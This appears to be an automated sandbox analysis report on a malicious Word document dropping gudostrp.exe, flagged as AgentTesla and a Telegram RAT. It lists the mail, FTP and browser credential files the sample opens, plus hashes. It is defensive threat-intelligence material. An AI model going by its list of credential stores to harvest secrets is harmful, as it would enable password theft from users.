Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

ID:	502700
Product:	CloudBasic
Start time:	10:22:11
Start date:	14.10.2021
Sample:	Purchase Order_0131021.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	fc66be4a9696798aff0be8ed97bd294f
SHA1:	cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256:	8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	BC5F0AA0262021DB5921D726F7A5B820	B41245E3BBFC8A7905BFC56B88EA79975595F4F6	B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4877C7E7-A321-4438-A27A-0B7C6E560902}.tmp	data	2BDACAB3747178F7E0A6F4D7A31F6D11	C437C2836EAA2A00BBBA64EC08E0BB40FE4478C8	3C1F78FABA6BDA5501E0019283F0D25EA06A379B24D2E8C1CA790B6749A08D89
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase Order_0131021.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Thu Oct 14 16:22:13 2021, length=15658, window=hide	5553B96A2ED8B4558BACEB47D38C1748	70A0DA9820F6E3C5E755B8BD90B20705058049F0	03E1FC72B2CDD61EBC996E5C2F95D4785502F121B329015D72F3B4597FDA7271
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	AD3C75BA1EBB2EB0F34E5EDABE1344B8	EC8A7EADE69E7CB6FA86D3ACC021470E8186E57B	84A877A95B14C0E7DDE0A99EB2BF9E56BC85130998E5F2DC3BBF6E4D47AF6F8F
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Little-endian UTF-16 Unicode text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\gudostrp.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	BC5F0AA0262021DB5921D726F7A5B820	B41245E3BBFC8A7905BFC56B88EA79975595F4F6	B227A0AE42AA451635BCE6E3D50A05D895A3B6FA479B6882A548721A38091F25
C:\Users\user\Desktop\~$rchase Order_0131021.doc	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6

Windows Analysis Report Purchase Order_0131021.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs